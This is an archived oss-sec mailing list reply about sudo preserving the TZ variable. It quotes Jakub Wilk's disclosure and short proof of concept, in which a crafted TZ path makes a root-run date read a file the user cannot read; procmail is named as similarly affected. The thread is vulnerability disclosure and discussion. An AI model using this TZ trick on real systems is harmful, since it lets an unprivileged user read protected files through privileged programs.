oss-sec mailing list archives
Re: Abusing TZ for fun (and little profit)
From: Dan McDonald <danmcd () omniti com>
Date: Wed, 15 Oct 2014 19:52:50 -0400
Libraries that use TZ (or any environment variable) should be careful. For example... http://src.illumos.org/source/xref/illumos-gate/usr/src/lib/libc/port/gen/localtime.c#1417 Thanks for the reality check. Glad we passed. Dan Sent from my iPhone (typos, autocorrect, and all)
On Oct 15, 2014, at 6:35 PM, Jakub Wilk <jwilk () jwilk net> wrote: By default, sudo preserves the TZ variable[1] from user's environment. This is a bad idea on glibc systems, where TZ can be abused to trick the program to read an arbitrary file. PoC: $ echo moo > tz $ chmod 0 tz $ cat tz cat: tz: Permission denied $ TZ=$PWD/tz sudo -u root strace -e read date read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300\233\1\0004\0\0\0"..., 512) = 512 read(3, "moo\n", 4096) = 4 read(3, "", 4096) = 0 Wed Oct 15 20:42:42 2014 +++ exited with 0 +++ Procmail is another program that recklessly whitelists TZ[2]. [1] https://sources.debian.net/src/sudo/1.8.5p2-1%2Bnmu1/plugins/sudoers/env.c/?hl=198#L189 [2] https://sources.debian.net/src/procmail/3.22-20%2Bdeb7u1/config.h/?hl=22#L13 -- Jakub Wilk
Current thread:
- Abusing TZ for fun (and little profit) Jakub Wilk (Oct 15)
- Re: Abusing TZ for fun (and little profit) Dave Horsfall (Oct 15)
- Re: Abusing TZ for fun (and little profit) Dag-Erling Smørgrav (Oct 16)
- Re: Abusing TZ for fun (and little profit) Dan McDonald (Oct 15)
- Re: Abusing TZ for fun (and little profit) Jakub Wilk (Dec 14)
- Re: Abusing TZ for fun (and little profit) Dave Horsfall (Oct 15)